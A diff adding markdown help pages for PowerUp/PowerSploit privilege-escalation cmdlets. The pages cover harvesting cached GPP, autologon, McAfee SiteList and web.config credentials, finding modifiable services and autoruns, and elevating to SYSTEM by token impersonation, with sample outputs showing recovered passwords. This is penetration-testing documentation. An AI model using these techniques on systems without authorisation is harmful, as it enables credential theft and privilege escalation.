+Comments: Should work on IIS 6 and Above + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Get-CachedGPPPassword.md b/docs/Privesc/Get-CachedGPPPassword.md new file mode 100755 index 0000000..2169a15 --- /dev/null +++ b/docs/Privesc/Get-CachedGPPPassword.md @@ -0,0 +1,55 @@ +# Get-CachedGPPPassword + +## SYNOPSIS +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and +left in cached files on the host. + +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-CachedGPPPassword +``` + +## DESCRIPTION +Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and +datasources.xml files and returns plaintext passwords. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-CachedGPPPassword +``` + +NewName : \[BLANK\] +Changed : {2013-04-25 18:36:07} +Passwords : {Super!!!Password} +UserNames : {SuperSecretBackdoor} +File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 + C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr + oups.xml + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) + diff --git a/docs/Privesc/Get-ModifiablePath.md b/docs/Privesc/Get-ModifiablePath.md new file mode 100755 index 0000000..2a1118f --- /dev/null +++ b/docs/Privesc/Get-ModifiablePath.md @@ -0,0 +1,102 @@ +# Get-ModifiablePath + +## SYNOPSIS +Parses a passed string containing multiple possible file/folder paths and returns +the file paths where the current user has modification rights. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ModifiablePath [-Path] [-Literal] +``` + +## DESCRIPTION +Takes a complex path specification of an initial file/folder path with possible +configuration files, 'tokenizes' the string in a number of possible ways, and +enumerates the ACLs for each path that currently exists on the system. +Any path that +the current user has modification rights on is returned in a custom object that contains +the modifiable path, associated permission set, and the IdentityReference with the specified +rights. +The SID of the current user and any group he/she are a part of are used as the +comparison set against the parsed path DACLs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Temp\blah.exe {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Temp\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Vuln\blah.bat {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Vuln\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +... + +## PARAMETERS + +### -Path +The string path to parse for modifiable files. +Required + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: FullName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Literal +Switch. +Treat all paths as literal (i.e. +don't do 'tokenization'). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: LiteralPaths + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenPrivilege.ModifiablePath + +Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for +a modifiable path. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableRegistryAutoRun.md b/docs/Privesc/Get-ModifiableRegistryAutoRun.md new file mode 100755 index 0000000..23314f9 --- /dev/null +++ b/docs/Privesc/Get-ModifiableRegistryAutoRun.md @@ -0,0 +1,44 @@ +# Get-ModifiableRegistryAutoRun + +## SYNOPSIS +Returns any elevated system autoruns in which the current user can +modify part of the path string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableRegistryAutoRun +``` + +## DESCRIPTION +Enumerates a number of autorun specifications in HKLM and filters any +autoruns through Get-ModifiablePath, returning any file/config locations +in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableRegistryAutoRun +``` + +Return vulneable autorun binaries (or associated configs). + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableRegistryAutoRun + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableScheduledTaskFile.md b/docs/Privesc/Get-ModifiableScheduledTaskFile.md new file mode 100755 index 0000000..4e48cc4 --- /dev/null +++ b/docs/Privesc/Get-ModifiableScheduledTaskFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableScheduledTaskFile + +## SYNOPSIS +Returns scheduled tasks where the current user can modify any file +in the associated task action string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableScheduledTaskFile +``` + +## DESCRIPTION +Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" +and parses the XML specification for each task, extracting the command triggers. +Each trigger string is filtered through Get-ModifiablePath, returning any file/config +locations in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableScheduledTaskFile +``` + +Return scheduled tasks with modifiable command strings. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableScheduledTaskFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableService.md b/docs/Privesc/Get-ModifiableService.md new file mode 100755 index 0000000..92eeb81 --- /dev/null +++ b/docs/Privesc/Get-ModifiableService.md @@ -0,0 +1,40 @@ +# Get-ModifiableService + +## SYNOPSIS +Enumerates all services and returns services for which the current user can modify the binPath. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail + +## SYNTAX + +``` +Get-ModifiableService +``` + +## DESCRIPTION +Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if +the current user has rights to change the service configuration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableServiceFile.md b/docs/Privesc/Get-ModifiableServiceFile.md new file mode 100755 index 0000000..ab01e42 --- /dev/null +++ b/docs/Privesc/Get-ModifiableServiceFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableServiceFile + +## SYNOPSIS +Enumerates all services and returns vulnerable service files. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableServiceFile +``` + +## DESCRIPTION +Enumerates all services by querying the WMI win32_service class. +For each service, +it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine +if the current user has rights to modify the service binary itself or any associated +arguments. +If the associated binary (or any configuration files) can be overwritten, +privileges may be able to be escalated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableServiceFile +``` + +Get a set of potentially exploitable service binares/config files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ProcessTokenGroup.md b/docs/Privesc/Get-ProcessTokenGroup.md new file mode 100755 index 0000000..e52533c --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenGroup.md @@ -0,0 +1,114 @@ +# Get-ProcessTokenGroup + +## SYNOPSIS +Returns all SIDs that the current token context is a part of, whether they are disabled or not. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenGroup [[-Id] ] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current token groups for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 1372 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 1372 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-16-8192 1372 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 2640 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 2640 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-16-8192 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ProcessTokenPrivilege.md b/docs/Privesc/Get-ProcessTokenPrivilege.md new file mode 100755 index 0000000..9f835f2 --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenPrivilege.md @@ -0,0 +1,131 @@ +# Get-ProcessTokenPrivilege + +## SYNOPSIS +Returns all privileges for the current (or specified) process ID. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenPrivilege [[-Id] ] [-Special] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current privileges for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 2600 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2600 + SeUndockPrivilege DISABLED 2600 +SeIncreaseWorkingSetPrivilege DISABLED 2600 + SeTimeZonePrivilege DISABLED 2600 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege -Special +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeSecurityPrivilege DISABLED 2444 +SeTakeOwnershipPrivilege DISABLED 2444 +SeBackupPrivilege DISABLED 2444 +SeRestorePrivilege DISABLED 2444 +SeSystemEnvironmentPriv... +DISABLED 2444 +SeImpersonatePrivilege ...T, SE_PRIVILEGE_ENABLED 2444 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenPrivilege | fl +``` + +Privilege : SeShutdownPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeChangeNotifyPrivilege +Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +ProcessId : 2640 + +Privilege : SeUndockPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeIncreaseWorkingSetPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeTimeZonePrivilege +Attributes : DISABLED +ProcessId : 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Special +Switch. +Only return 'special' privileges, meaning admin-level privileges. +These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, +SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Privileged + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-RegistryAlwaysInstallElevated.md b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md new file mode 100755 index 0000000..ff48afc --- /dev/null +++ b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md @@ -0,0 +1,45 @@ +# Get-RegistryAlwaysInstallElevated + +## SYNOPSIS +Checks if any of the AlwaysInstallElevated registry keys are set. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAlwaysInstallElevated +``` + +## DESCRIPTION +Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated +or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys +are set, $False otherwise. +If one of these keys are set, then all .MSI files run with +elevated permissions, regardless of current user permissions. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAlwaysInstallElevated +``` + +Returns $True if any of the AlwaysInstallElevated registry keys are set. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +$True if RegistryAlwaysInstallElevated is set, $False otherwise. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-RegistryAutoLogon.md b/docs/Privesc/Get-RegistryAutoLogon.md new file mode 100755 index 0000000..b93e75c --- /dev/null +++ b/docs/Privesc/Get-RegistryAutoLogon.md @@ -0,0 +1,44 @@ +# Get-RegistryAutoLogon + +## SYNOPSIS +Finds any autologon credentials left in the registry. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAutoLogon +``` + +## DESCRIPTION +Checks if any autologon accounts/credentials are set in a number of registry locations. +If they are, the credentials are extracted and returned as a custom PSObject. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAutoLogon +``` + +Finds any autologon credentials left in the registry. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.RegistryAutoLogon + +Custom PSObject containing autologin credentials found in the registry. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb) + diff --git a/docs/Privesc/Get-ServiceDetail.md b/docs/Privesc/Get-ServiceDetail.md new file mode 100755 index 0000000..ac758b0 --- /dev/null +++ b/docs/Privesc/Get-ServiceDetail.md @@ -0,0 +1,65 @@ +# Get-ServiceDetail + +## SYNOPSIS +Returns detailed information about a specified service by querying the +WMI win32_service class for the specified service name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ServiceDetail [-Name] +``` + +## DESCRIPTION +Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on +the pipeline object returned by Get-Service, extracts out the service name, queries the +WMI win32_service class for the specified service for details like binPath, and outputs +everything. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ServiceDetail -Name VulnSVC +``` + +Gets detailed information about the 'VulnSVC' service. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Get-ServiceDetail +``` + +Gets detailed information about the 'VulnSVC' service. + +## PARAMETERS + +### -Name +An array of one or more service names to query information for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.ManagementObject + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-SiteListPassword.md b/docs/Privesc/Get-SiteListPassword.md new file mode 100755 index 0000000..1ebbb5b --- /dev/null +++ b/docs/Privesc/Get-SiteListPassword.md @@ -0,0 +1,96 @@ +# Get-SiteListPassword + +## SYNOPSIS +Retrieves the plaintext passwords for found McAfee's SiteList.xml files. +Based on Jerome Nokin (@funoverip)'s Python solution (in links). + +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-SiteListPassword [[-Path] ] +``` + +## DESCRIPTION +Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\, +C:\Documents and Settings\, or C:\Users\. +For any files found, the appropriate +credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword +function that takes advantage of McAfee's static key encryption. +Any decrypted credentials +are output in custom objects. +See links for more information. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-SiteListPassword +``` + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : +Path : Products/CommonUpdater +Name : McAfeeHttp +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : +Server : update.nai.com:80 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Paris +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : paris001 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Tokyo +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : tokyo000 + +## PARAMETERS + +### -Path +Optional path to a SiteList.xml file or folder. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.SiteListPassword + +## NOTES + +## RELATED LINKS + +[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf) + diff --git a/docs/Privesc/Get-System.md b/docs/Privesc/Get-System.md new file mode 100755 index 0000000..bcaf3d6 --- /dev/null +++ b/docs/Privesc/Get-System.md @@ -0,0 +1,172 @@ +# Get-System + +## SYNOPSIS +GetSystem functionality inspired by Meterpreter's getsystem. +'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create +a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege. +NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure +token duplication works correctly. + +PowerSploit Function: Get-System +Author: @harmj0y, @mattifestation +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### NamedPipe (Default) +``` +Get-System [-Technique ] [-ServiceName ] [-PipeName ] +``` + +### Token +``` +Get-System [-Technique ] +``` + +### RevToSelf +``` +Get-System [-RevToSelf] +``` + +### WhoAmI +``` +Get-System [-WhoAmI] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-System +``` + +Uses named impersonate to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' +``` + +Uses named impersonate to elevate the current thread token to SYSTEM +with a custom service and pipe name. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-System -Technique Token +``` + +Uses token duplication to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-System -WhoAmI +``` + +Displays the credentials for the current thread. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-System -RevToSelf +``` + +Reverts the current thread privileges. + +## PARAMETERS + +### -Technique +The technique to use, 'NamedPipe' or 'Token'. + +```yaml +Type: String +Parameter Sets: NamedPipe, Token +Aliases: + +Required: False +Position: Named +Default value: NamedPipe +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServiceName +The name of the service used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PipeName +The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RevToSelf +Reverts the current thread privileges. + +```yaml +Type: SwitchParameter +Parameter Sets: RevToSelf +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WhoAmI +Switch. +Display the credentials for the current PowerShell thread. + +```yaml +Type: SwitchParameter +Parameter Sets: WhoAmI +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/) + diff --git a/docs/Privesc/Get-UnattendedInstallFile.md b/docs/Privesc/Get-UnattendedInstallFile.md new file mode 100755 index 0000000..8927520 --- /dev/null +++ b/docs/Privesc/Get-UnattendedInstallFile.md @@ -0,0 +1,44 @@ +# Get-UnattendedInstallFile + +## SYNOPSIS +Checks several locations for remaining unattended installation files, +which may have deployment credentials. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-UnattendedInstallFile +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnattendedInstallFile +``` + +Finds any remaining unattended installation files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnattendedInstallFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + +[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) + diff --git a/docs/Privesc/Get-UnquotedService.md b/docs/Privesc/Get-UnquotedService.md new file mode 100755 index 0000000..4b61355 --- /dev/null +++ b/docs/Privesc/Get-UnquotedService.md @@ -0,0 +1,45 @@ +# Get-UnquotedService + +## SYNOPSIS +Get-UnquotedService Returns the name and binary path for services with unquoted paths +that also have a space in the name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath, Test-ServiceDaclPermission + +## SYNTAX + +``` +Get-UnquotedService +``` + +## DESCRIPTION +Uses Get-WmiObject to query all win32_service objects and extract out +the binary pathname for each. +Then checks if any binary paths have a space +and aren't quoted. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnquotedService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnquotedService + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/trusted_service_path.rb) + diff --git a/docs/Privesc/Get-WebConfig.md b/docs/Privesc/Get-WebConfig.md new file mode 100755 index 0000000..78cef7d --- /dev/null +++ b/docs/Privesc/Get-WebConfig.md @@ -0,0 +1,93 @@ +# Get-WebConfig + +## SYNOPSIS +This script will recover cleartext and encrypted connection strings from all web.config +files on the system. +Also, it will decrypt them if needed. + +Author: Scott Sutherland, Antti Rantasaari +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WebConfig +``` + +## DESCRIPTION +This script will identify all of the web.config files on the system and recover the +connection strings used to support authentication to backend databases. +If needed, the +script will also decrypt the connection strings on the fly. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-WebConfig + +user : s1admin +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\test2 +path : C:\test2\web.config +encr : No + +user : s1user +pass : s1password +dbserv : 192.168.1.103\server1 +vdir : C:\inetpub\wwwroot +path : C:\inetpub\wwwroot\web.config +encr : Yes + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of clear text and decrypted connect strings from web.config files. +``` + +Get-WebConfig | Format-Table -Autosize + +user pass dbserv vdir path encr +---- ---- ------ ---- ---- ---- 